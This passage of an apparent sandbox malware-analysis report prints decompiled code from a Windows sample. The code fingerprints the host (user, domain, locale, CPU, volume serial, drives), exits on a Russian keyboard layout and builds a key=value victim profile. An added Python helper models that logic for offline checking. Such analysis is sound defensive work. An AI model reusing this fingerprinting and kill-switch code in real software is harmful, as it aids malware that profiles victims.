                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D49B6
                                        • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F9D4A2A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D4A44
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4A5D
                                        • ExitProcess.KERNEL32 ref: 0F9D4A65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                        • String ID: open
                                        • API String ID: 1803241880-2758837156
                                        • Opcode ID: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction ID: fdc6b6d1c67c11643e8d9a4aae9d46fc8452dfa71bc028d6fef35184dbc77727
                                        • Opcode Fuzzy Hash: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction Fuzzy Hash: DC710D70A45309ABEB14DBA4DC5AFEE7B78AB44716F308014F2017A1C2DBB86994CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 88%
                                        			E0F9D7330(DWORD* __ecx, void* __edx) {
                                        				void* _v8;
                                        				void* _v12;
                                        				long _v16;
                                        				long _v20;
                                        				int _v24;
                                        				int _v28;
                                        				intOrPtr _v32;
                                        				short _v36;
                                        				short _v40;
                                        				WCHAR* _v44;
                                        				WCHAR* _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				WCHAR* _v60;
                                        				WCHAR* _v64;
                                        				WCHAR* _v68;
                                        				signed short _v76;
                                        				char _v132;
                                        				void* _t154;
                                        				long _t155;
                                        				short _t158;
                                        				short _t159;
                                        				short _t160;
                                        				signed int _t161;
                                        				signed int _t166;
                                        				void* _t181;
                                        				signed int _t183;
                                        				signed int _t186;
                                        				WCHAR* _t190;
                                        				void* _t191;
                                        				void* _t199;
                                        				_Unknown_base(*)()* _t204;
                                        				signed int _t211;
                                        				intOrPtr _t216;
                                        				WCHAR* _t218;
                                        				WCHAR* _t220;
                                        				void* _t224;
                                        				int _t230;
                                        				void* _t238;
                                        				WCHAR* _t246;
                                        				void* _t247;
                                        				WCHAR* _t249;
                                        				WCHAR* _t250;
                                        				WCHAR* _t252;
                                        				void* _t256;
                                        				DWORD* _t260;
                                        				short* _t261;
                                        				DWORD* _t266;
                                        				void* _t267;
                                        				signed int _t270;
                                        				void* _t274;
                                        				void* _t276;
                                        				void* _t277;
                                        				DWORD* _t279;
                                        				void* _t280;
                                        				void* _t281;
                                        
                                        				_t267 = __edx;
                                        				_t260 = __ecx;
                                        				_t279 = __ecx;
                                        				if( *__ecx != 0) {
                                        					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4);
                                        					_t260 =  &_v24;
                                        					 *(_t279 + 8) = _t252;
                                        					_v24 = 0x100;
                                        					GetUserNameW(_t252, _t260);
                                        				}
                                        				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
                                        					_v24 = 0x1e;
                                        					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4);
                                        					_t260 =  &_v24;
                                        					 *(_t279 + 0x14) = _t250;
                                        					GetComputerNameW(_t250, _t260);
                                        				}
                                        				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
                                        					L11:
                                        					if( *(_t279 + 0x30) == 0) {
                                        						L18:
                                        						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
                                        							L31:
                                        							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
                                        								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4);
                                        								_push(_t260);
                                        								 *(_t279 + 0x50) = _t220;
                                        								if(E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80) == 0) {
                                        									_push(_t260);
                                        									E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
                                        									wsprintfW( *(_t279 + 0x50), L"error");
                                        									_t281 = _t281 + 8;
                                        								}
                                        							}
                                        							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
                                        								L44:
                                        								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
                                        									_v28 = 0;
                                        									_t216 = E0F9D7A10(_t279 + 0x2c,  &_v28);
                                        									if(_t216 == 0) {
                                        										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
                                        									}
                                        								}
                                        								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
                                        									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                        									 *(_t279 + 0x68) = _t190;
                                        									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                        									_t276 = _t191;
                                        									GetWindowsDirectoryW(_t276, 0x100);
                                        									_t66 = _t276 + 0x600; // 0x600
                                        									_t266 = _t66;
                                        									 *((short*)(_t276 + 6)) = 0;
                                        									_t68 = _t276 + 0x400; // 0x400
                                        									_t69 = _t276 + 0x604; // 0x604
                                        									_t70 = _t276 + 0x608; // 0x608
                                        									_t71 = _t276 + 0x200; // 0x200
                                        									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
                                        									_push(_t266);
                                        									_t72 = _t276 + 0x60c; // 0x60c
                                        									_t260 = _t72;
                                        									_t199 = E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
                                        									if(_t199 != 0) {
                                        										_t73 = _t276 + 0x60c; // 0x60c
                                        										_t211 = lstrlenW(_t73);
                                        										_t74 = _t276 + 0x60c; // 0x60c
                                        										_t260 = _t74;
                                        										_push(_t260);
                                        										E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
                                        									}
                                        									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
                                        									_t79 = _t276 + 0x60c; // 0x60c
                                        									_t281 = _t281 + 0xc;
                                        									lstrcatW( *(_t279 + 0x68), _t79);
                                        									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                        									_v28 = _t204;
                                        									if(_t204 == 0) {
                                        										 *(_t279 + 0x6c) = 0;
                                        									} else {
                                        										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
                                        									}
                                        									 *(_t279 + 0x70) =  *(_t276 + 0x600);
                                        									VirtualFree(_t276, 0, 0x8000); // executed
                                        								}
                                        								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
                                        									L67:
                                        									if( *(_t279 + 0x80) == 0) {
                                        										L72:
                                        										return 1;
                                        									}
                                        									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4);
                                        									 *(_t279 + 0x84) = _t154;
                                        									if(_t154 == 0) {
                                        										L71:
                                        										 *(_t279 + 0x80) = 0;
                                        										goto L72;
                                        									}
                                        									_push(_t260);
                                        									_t155 = E0F9D6E90(_t154);
                                        									if(_t155 != 0) {
                                        										goto L72;
                                        									}
                                        									VirtualFree( *(_t279 + 0x84), _t155, 0x8000);
                                        									goto L71;
                                        								} else {
                                        									_v68 = L"UNKNOWN";
                                        									_v64 = L"NO_ROOT_DIR";
                                        									_v60 = L"REMOVABLE";
                                        									_v56 = L"FIXED";
                                        									_v52 = L"REMOTE";
                                        									_v48 = L"CDROM";
                                        									_v44 = L"RAMDISK";
                                        									 *(_t279 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        									_t261 =  &_v132;
                                        									_t158 = 0x41;
                                        									do {
                                        										 *_t261 = _t158;
                                        										_t261 = _t261 + 2;
                                        										_t158 = _t158 + 1;
                                        									} while (_t158 <= 0x5a);
                                        									_t159 =  *L"?:\\"; // 0x3a003f
                                        									_v40 = _t159;
                                        									_t160 =  *0xf9df348; // 0x5c
                                        									_v36 = _t160;
                                        									_t161 = 0;
                                        									_v24 = 0;
                                        									do {
                                        										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
                                        										_t270 = GetDriveTypeW( &_v40);
                                        										if(_t270 > 2 && _t270 != 5) {
                                        											_v36 = 0;
                                        											lstrcatW( *(_t279 + 0x7c),  &_v40);
                                        											_v36 = 0x5c;
                                        											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
                                        											lstrcatW( *(_t279 + 0x7c), "_");
                                        											if(GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16) == 0) {
                                        												lstrcatW( *(_t279 + 0x7c), L"0,");
                                        												goto L64;
                                        											}
                                        											_v8 = E0F9D8950(_v16, 0, _v28 * _v20, 0);
                                        											_t256 = _t267;
                                        											_t181 = E0F9D8950(_v12, 0, _v28 * _v20, 0);
                                        											_t274 = _v8;
                                        											_v32 = _t274 - _t181;
                                        											asm("sbb eax, edx");
                                        											_v8 = _t256;
                                        											_t183 = lstrlenW( *(_t279 + 0x7c));
                                        											_push(_t256);
                                        											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
                                        											_t186 = lstrlenW( *(_t279 + 0x7c));
                                        											_push(_v8);
                                        											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
                                        											_t281 = _t281 + 0x20;
                                        											lstrcatW( *(_t279 + 0x7c), ",");
                                        										}
                                        										_t161 = _v24 + 1;
                                        										_v24 = _t161;
                                        									} while (_t161 < 0x1b);
                                        									_t166 = lstrlenW( *(_t279 + 0x7c));
                                        									_t260 =  *(_t279 + 0x7c);
                                        									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
                                        									goto L67;
                                        								}
                                        							} else {
                                        								__imp__GetNativeSystemInfo( &_v76);
                                        								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4);
                                        								_t260 = _v76 & 0x0000ffff;
                                        								 *(_t279 + 0x5c) = _t218;
                                        								if(_t260 > 9) {
                                        									L42:
                                        									_push(L"Unknown");
                                        									L43:
                                        									wsprintfW(_t218, ??);
                                        									_t281 = _t281 + 8;
                                        									goto L44;
                                        								}
                                        								_t260 =  *(_t260 + E0F9D7A00) & 0x000000ff;
                                        								switch( *((intOrPtr*)(_t260 * 4 +  &M0F9D79EC))) {
                                        									case 0:
                                        										_push(L"x86");
                                        										goto L43;
                                        									case 1:
                                        										_push(L"ARM");
                                        										goto L43;
                                        									case 2:
                                        										_push(L"Itanium");
                                        										goto L43;
                                        									case 3:
                                        										_push(L"x64");
                                        										goto L43;
                                        									case 4:
                                        										goto L42;
                                        								}
                                        							}
                                        						}
                                        						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4);
                                        						_v8 = _t224;
                                        						_v20 = _t224 + 0xe;
                                        						 *(_t279 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
                                        						_t277 = 1;
                                        						_v24 = 1;
                                        						do {
                                        							wsprintfW(_v8, L"%d", _t277);
                                        							_t281 = _t281 + 0xc;
                                        							_v16 = 0;
                                        							_t277 = _t277 + 1;
                                        							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12) != 0) {
                                        								L27:
                                        								_t230 = 0;
                                        								_v24 = 0;
                                        								goto L28;
                                        							}
                                        							_v28 = 0x80;
                                        							if(RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28) != 0) {
                                        								GetLastError();
                                        							} else {
                                        								_v16 = 1;
                                        							}
                                        							RegCloseKey(_v12);
                                        							if(_v16 == 0) {
                                        								goto L27;
                                        							} else {
                                        								if(lstrcmpiW(_v20, L"00000419") == 0) {
                                        									_t218 = wsprintfW( *(_t279 + 0x44), "1");
                                        									_t281 = _t281 + 8;
                                        									ExitProcess(0);
                                        								}
                                        								_t230 = _v24;
                                        							}
                                        							L28:
                                        						} while (_t277 != 9 && _t230 != 0);
                                        						wsprintfW( *(_t279 + 0x44), "0");
                                        						_t281 = _t281 + 8;
                                        						VirtualFree(_v8, 0, 0x8000);
                                        						goto L31;
                                        					}
                                        					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4);
                                        					_v20 = _t238;
                                        					 *(_t279 + 0x38) = _t238;
                                        					_v12 = 0;
                                        					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8) != 0) {
                                        						L17:
                                        						 *(_t279 + 0x30) = 0;
                                        						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
                                        						goto L18;
                                        					}
                                        					_v24 = 0x40;
                                        					if(RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24) != 0) {
                                        						GetLastError();
                                        					} else {
                                        						_v12 = 1;
                                        					}
                                        					RegCloseKey(_v8);
                                        					if(_v12 != 0) {
                                        						goto L18;
                                        					} else {
                                        						goto L17;
                                        					}
                                        				} else {
                                        					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                        					 *(_t279 + 0x20) = _t246;
                                        					if(_t246 == 0) {
                                        						goto L11;
                                        					}
                                        					_push(_t260);
                                        					_t247 = E0F9D72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
                                        					if(_t247 == 0) {
                                        						wsprintfW( *(_t279 + 0x20), L"undefined");
                                        						L10:
                                        						_t281 = _t281 + 8;
                                        						goto L11;
                                        					}
                                        					_t249 =  *(_t279 + 0x20);
                                        					if( *_t249 != 0) {
                                        						goto L11;
                                        					}
                                        					wsprintfW(_t249, L"WORKGROUP");
                                        					goto L10;
                                        				}
                                        			}
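The routine above is the sample's host-profiling step: it collects the user, computer and domain names, the locale, the preloaded keyboard layouts, the product name, the processor architecture, a CRC derived from the Windows volume serial and the CPU strings, and a per-drive size summary. The Python helper below is an added analyst example, not code from this report or from the sample, that models three of those decisions so they can be replayed against exported host artifacts: the Keyboard Layout\Preload kill-switch (exit as soon as one of values "1".."8" equals 00000419), the RtlComputeCrc32(0x29A, ...) identifier over the "%d"-formatted volume serial followed by ProcessorNameString and Identifier, and the drive string with its <total>/<used> fields. It assumes that RtlComputeCrc32 is the standard continuable CRC-32 that zlib.crc32(data, seed) implements, and that the length expression the decompiler lost (lstrlenW(...) + _t207) is the UTF-16LE byte length of the buffer; all inputs in the block are constructed.

```python
"""Added analyst helper; not part of the sandbox report or of the sample.

Models three decisions of the profiling routine E0F9D7330 so they can be
checked offline against exported artifacts.  Every input here is constructed.
"""
import zlib

# GetDriveTypeW result -> name, the table the routine builds on its stack.
DRIVE_TYPE_NAMES = ("UNKNOWN", "NO_ROOT_DIR", "REMOVABLE", "FIXED",
                    "REMOTE", "CDROM", "RAMDISK")
RUSSIAN_LAYOUT = "00000419"   # compared with lstrcmpiW in the Preload loop
CRC_SEED = 0x29A              # first argument of the RtlComputeCrc32 call


def has_russian_layout(preload):
    """HKCU\\Keyboard Layout\\Preload check.  The routine queries values "1".."8"
    in order, stops at the first one it cannot read, and calls ExitProcess(0)
    as soon as one compares equal (case-insensitive) to 00000419.
    `preload` maps value name -> data string, as exported from the hive."""
    for i in range(1, 9):
        value = preload.get(str(i))
        if value is None:
            return False              # unreadable value ends the loop, flag stays "0"
        if value.lower() == RUSSIAN_LAYOUT:
            return True               # the sample exits here
    return False


def serial_as_wsprintf_d(volume_serial):
    """wsprintfW(L"%d", serial) prints the DWORD as a *signed* 32-bit decimal."""
    serial = volume_serial & 0xFFFFFFFF
    if serial & 0x80000000:
        serial -= 1 << 32
    return str(serial)


def rtl_compute_crc32(initial, data):
    """ntdll!RtlComputeCrc32(InitialCrc, Buffer, Length): continuable CRC-32
    (reflected polynomial 0xEDB88320, pre/post inversion).  Assumption: this is
    exactly what zlib.crc32(data, initial) computes."""
    return zlib.crc32(data, initial) & 0xFFFFFFFF


def victim_id(volume_serial, cpu_name, cpu_identifier="", wide=True):
    """CRC over "<serial>" + ProcessorNameString + Identifier with seed 0x29A.
    Identifier is only appended when the name was read (the routine appends it
    at lstrlenW(name) * 2 inside the same buffer).  wide=True hashes the UTF-16LE
    bytes (assumed meaning of the lost length expression); wide=False hashes
    only lstrlenW bytes, i.e. the first half of the buffer."""
    text = serial_as_wsprintf_d(volume_serial)
    if cpu_name:
        text += cpu_name + cpu_identifier
    data = text.encode("utf-16-le")
    if not wide:
        data = data[:len(text)]
    return rtl_compute_crc32(CRC_SEED, data)


def drive_summary(drives):
    """Drive loop: for A..Z keep GetDriveTypeW results > 2 other than CDROM (5)
    and append "<L>:<TYPE>_<total>/<used>," where total and used are 64-bit
    cluster counts * sectors_per_cluster * bytes_per_sector (the second field
    is used space, total minus free), or "<L>:<TYPE>_0," when GetDiskFreeSpaceW
    fails; the trailing comma is cut at the end.  `drives` maps letter ->
    (type, None) or letter -> (type, (sectors_per_cluster, bytes_per_sector,
    free_clusters, total_clusters)); absent letters count as NO_ROOT_DIR."""
    out = ""
    for letter in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        drive_type, geometry = drives.get(letter, (1, None))
        if drive_type <= 2 or drive_type == 5:
            continue
        out += f"{letter}:{DRIVE_TYPE_NAMES[drive_type]}_"
        if geometry is None:
            out += "0,"
            continue
        spc, bps, free_clusters, total_clusters = geometry
        total = total_clusters * spc * bps
        used = total - free_clusters * spc * bps
        out += f"{total}/{used},"
    # The sample overwrites the last character unconditionally; guard the empty case.
    return out[:-1] if out.endswith(",") else out


if __name__ == "__main__":
    # Constructed host: US layout only, one fixed disk, one unreadable share.
    print(has_russian_layout({"1": "00000409"}))
    print(hex(victim_id(0xDEADBEEF, "Intel(R) Core(TM) i7", "x86 Family 6 Model 158")))
    print(drive_summary({"C": (3, (8, 512, 250, 1000)), "D": (5, None), "Z": (4, None)}))
```

Two details of the listing are easy to misread and the helper makes them explicit: because wsprintfW's %d is signed, a serial such as 0xDEADBEEF enters the CRC as "-559038737", and the second number of each drive entry is used space (total minus free), not free space. A host that has a Russian layout anywhere in Preload values 1..8 never reaches the rest of the routine.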
                                        (per-line instruction address column for the listing above, 0x0f9d7330 .. 0x0f9d7566, omitted)
                                        0x0f9d7566
                                        0x0f9d750c
                                        0x0f9d7529
                                        0x0f9d7534
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d753d
                                        0x0f9d7547
                                        0x00000000
                                        0x0f9d7549
                                        0x0f9d7559
                                        0x0f9d763a
                                        0x0f9d763c
                                        0x0f9d7641
                                        0x0f9d7641
                                        0x0f9d755f
                                        0x0f9d755f
                                        0x0f9d7569
                                        0x0f9d7569
                                        0x0f9d757e
                                        0x0f9d7580
                                        0x0f9d758d
                                        0x00000000
                                        0x0f9d7593
                                        0x0f9d740e
                                        0x0f9d7410
                                        0x0f9d7413
                                        0x0f9d742b
                                        0x0f9d743a
                                        0x0f9d747e
                                        0x0f9d7488
                                        0x0f9d748f
                                        0x00000000
                                        0x0f9d748f
                                        0x0f9d743f
                                        0x0f9d745e
                                        0x0f9d7469
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7472
                                        0x0f9d747c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d73a2
                                        0x0f9d73b0
                                        0x0f9d73b2
                                        0x0f9d73b7
                                        0x00000000
                                        0x00000000
                                        0x0f9d73b9
                                        0x0f9d73cf
                                        0x0f9d73d6
                                        0x0f9d73f1
                                        0x0f9d73f1
                                        0x0f9d73f3
                                        0x00000000
                                        0x0f9d73f3
                                        0x0f9d73d8
                                        0x0f9d73df
                                        0x00000000
                                        0x00000000
                                        0x0f9d73f1
                                        0x00000000
                                        0x0f9d73f1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                        • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                        • GetComputerNameW.KERNEL32 ref: 0F9D7390
                                        • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                        • wsprintfW.USER32 ref: 0F9D73F1
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                        • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                        • RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                        • GetLastError.KERNEL32 ref: 0F9D7469
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D748F
                                        • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F9D74AD
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D74C3
                                        • wsprintfW.USER32 ref: 0F9D74DD
                                        • RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F9D74FF
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,0F9D4640,?), ref: 0F9D7521
                                        • GetLastError.KERNEL32 ref: 0F9D7534
                                        • RegCloseKey.ADVAPI32(?), ref: 0F9D753D
                                        • lstrcmpiW.KERNEL32(0F9D4640,00000419), ref: 0F9D7551
                                        • wsprintfW.USER32 ref: 0F9D757E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D758D
                                        • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F9D75AD
                                        • wsprintfW.USER32 ref: 0F9D75F6
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0F9D7605
                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F9D7616
                                        • wsprintfW.USER32 ref: 0F9D763A
                                        • ExitProcess.KERNEL32 ref: 0F9D7641
                                        • wsprintfW.USER32 ref: 0F9D7669
                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F9D76A7
                                        • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0F9D76BA
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D76C4
                                        • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F9D76FE
                                        • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7730
                                        • wsprintfW.USER32 ref: 0F9D7768
                                        • lstrcatW.KERNEL32(?,0000060C), ref: 0F9D777D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F9D7789
                                        • GetProcAddress.KERNEL32(00000000), ref: 0F9D7790
                                        • lstrlenW.KERNEL32(?), ref: 0F9D77A0
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F9D77D1
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                          • Part of subcall function 0F9D7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                          • Part of subcall function 0F9D7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D7828
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D786F
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7896
                                        • lstrcatW.KERNEL32(?,0F9E029C), ref: 0F9D78A8
                                        • lstrcatW.KERNEL32(?,0F9E0310), ref: 0F9D78B2
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,0F9D4640,?,00000000), ref: 0F9D78C8
                                        • lstrlenW.KERNEL32(?,?,00000000,0F9D4640,00000000,00000000,00000000,0F9D4640,00000000), ref: 0F9D7910
                                        • wsprintfW.USER32 ref: 0F9D792A
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7938
                                        • wsprintfW.USER32 ref: 0F9D794C
                                        • lstrcatW.KERNEL32(?,0F9E0330), ref: 0F9D795F
                                        • lstrcatW.KERNEL32(?,0F9E0334), ref: 0F9D796B
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7986
                                        • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F9D79A9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 0F9D79D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                        • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                        • API String ID: 153366582-983031137
                                        • Opcode ID: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction ID: 87f46a052380e17a54fa27737a3d91d83e7b1d83710cb35672e6a63a3a4e77ad
                                        • Opcode Fuzzy Hash: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction Fuzzy Hash: C112BE70A40305AFEB218FA0CC46FAEBBB8FF44705F208518F741A61E2D7B5A964CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                         			#include <windows.h>
                                         
                                         			/* Decompiler conventions: intOrPtr is a 4-byte int-or-pointer slot, and every
                                         			   offset below is a byte offset into the object passed in __ecx. */
                                         			typedef int intOrPtr;
                                         			#define FIELD(base, off) (*(WCHAR**)((char*)(base) + (off)))    /* WCHAR* stored at byte offset */
                                         			#define SLOT(base, off)  (*(intOrPtr*)((char*)(base) + (off)))  /* 4-byte value at byte offset */
                                         
                                         			/* Serialises the collected system-information fields into one
                                         			   "key=value&key=value" string. The object at __ecx holds (present, key,
                                         			   value) triples at fixed offsets; each present entry is appended to the
                                         			   caller's buffer _a4 and the trailing '&' is removed at the end. The raw
                                         			   decompilation shows "=" and "&" as narrow literals; the binary passes
                                         			   wide strings to lstrcatW, so they are written as L"..." here. */
                                         			WCHAR* E0F9D6F40(intOrPtr* __ecx, WCHAR* _a4) {
                                         				WCHAR* _t47;
                                         				intOrPtr* _t91;
                                         				intOrPtr _t94;
                                         				WCHAR* _t96;
                                         
                                         				_t91 = __ecx;
                                         				_t96 = _a4;
                                         				/* First triple is laid out out of order: flag 0x80, key 0x88, value 0x84. */
                                         				if(SLOT(__ecx, 0x80) != 0) {
                                         					lstrcatW(_t96, FIELD(__ecx, 0x88));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x84));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				/* Remaining triples follow a 0xc-byte stride: flag, key, value. */
                                         				if(*_t91 != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 4));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 8));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0xc) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x10));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x14));
                                         					lstrcatW(_t96, L"&");
                                         				}
